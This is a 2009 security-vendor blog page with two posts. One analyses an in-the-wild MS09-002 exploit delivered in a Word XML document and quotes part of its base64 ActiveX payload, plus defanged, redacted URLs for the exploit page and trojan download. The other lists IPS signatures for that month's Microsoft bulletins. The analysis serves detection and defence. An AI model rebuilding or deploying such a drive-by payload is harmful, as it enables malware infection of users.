Posts

MS09-002 Exploit (Feb 18, 2009)

/in /by

SonicWALL UTM Research Team has observed a new MS09-002 exploit being used in the wild in drive-by attacks.

This exploit involves a malicious Microsoft Word (.doc) document that uses XML format being delivered to the end user. The .doc has a file size of 3,871 bytes and attempts to exploit the Uninitialized Memory Corruption vulnerability (CVE-2009-0075) in Internet Explorer 7 patched by Microsoft in the MS09-002 patch release.

The malicious word document file contains the following specially crafted data bytes:

w:ocx w_data=”DATA:application/x-oleobject;BASE64,rv0krsYD0RGLdgCAx0TziQAAOAAAAGgAdAB0AHA (REMOVED) gAZQBuAGcAagBp AHQAagAuAGMAbwBtAC8AYgBiAHMALwBpAG0AYQBnAGUAcwA vAGEAbABpAHAAYQB5AC8AbQBtAC8A agBjAC8AagBjAC4AaAB0AG0AbAA= ” w_id=”DefaultOcxName” w_name=”DefaultOcxName” w_classid=”CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389″ w_w=”200″ w_h=”123″ wx_iPersistPropertyBag=”true”

When the end user opens the document file, it uses the Microsoft Scriptlet Component ActiveX control (CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389) to connect to following Malicious URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.html [detected as GAV: XMLhttpd.D (Exploit)]

jc.html file contains an obfuscated javascript code that further downloads a Trojan from following URL:

  • hxxp://(REMOVED)/bbs/images/alipay/mm/jc/jc.exe [detected as GAV: Rincux_4 (Trojan)]

The exploit has very low detection and is also known as Exploit-MSWord.k trojan (McAfee). SonicWALL GAV detects this exploit as GAV: MSWord.K (Exploit)

Microsoft Security Bulletin Coverage (Feb 13, 2009)

/in /by

During the first 2 months of 2009 Microsoft has published 5 security bulletins. Among them, MS09-001, MS09-003 and MS09-004 address vulnerabilities on the server side, while MS09-002 and MS09-005 address vulnerabilities on the client side. SonicWALL UTM team has analyzed each security bulletin and released IPS signatures that detect/prevent potential attacks leveraging these vulnerabilities. Below is the summary of security bulletins and the corresponding SonicWALL signatures.

MS09-001 Vulnerabilities in SMB Could Allow Remote Code Execution

  • IPS Sid 5357 — NETBIOS MS SMB TRANS Request Error Handling Memory Corruption PoC (MS09-001)
    CVE-2008-4834
  • IPS Sid 5358 — NETBIOS MS SMB OPEN2 Request Error Handling Memory Corruption PoC (MS09-001)
    CVE-2008-4835

MS09-002 Cumulative Security Update for Internet Explorer

  • IPS Sid 5379 — WEB-CLIENT MS IE Cloned Object Memory Corruption Attempt (MS09-002)
    CVE-2009-0075
  • IPS Sid 5387 — WEB-CLIENT MS IE CSS Processing Memory Corruption PoC (MS09-002)
    CVE-2009-0076

MS09-003 Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution

  • IPS Sid 5383 — DOS MS Exchange System Attendant DoS
    CVE-2009-0099
  • IPS Sid 5385 — SMTP MS Exchange TNEF Integer Underflow PoC (MS09-003)
    CVE-2009-0098

MS09-004 Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution

  • IPS Sid 1286 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (Unicode)
    CVE-2008-5416
  • IPS Sid 1292 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (ASCII)
    CVE-2008-5416
  • IPS Sid 1358 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (Unicode-SMB)
    CVE-2008-5416
  • IPS Sid 1360 — MS-SQL SQL Server sp_replwritetovarbin Procedure Attempt (ASCII-SMB)
    CVE-2008-5416

MS09-005 Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution

  • IPS Sid 5384 — MISC MS Visio Object ID Table Memory Corruption PoC (MS09-005)
    CVE-2009-0097
  • IPS Sid 5386 — MISC MS Visio Invalid Tag Handling Memory Corruption PoC (MS09-005)
    CVE-2009-0096
  • IPS Sid 5389 — MS Visio VSD File Icon Bits Memory Corruption PoC (MS09-005)
    CVE-2009-0096

Besides enabling prevention for these signatures, customers are advised to run Windows Update and get latest patches from Microsoft in order to maximize the protection against potential exploits.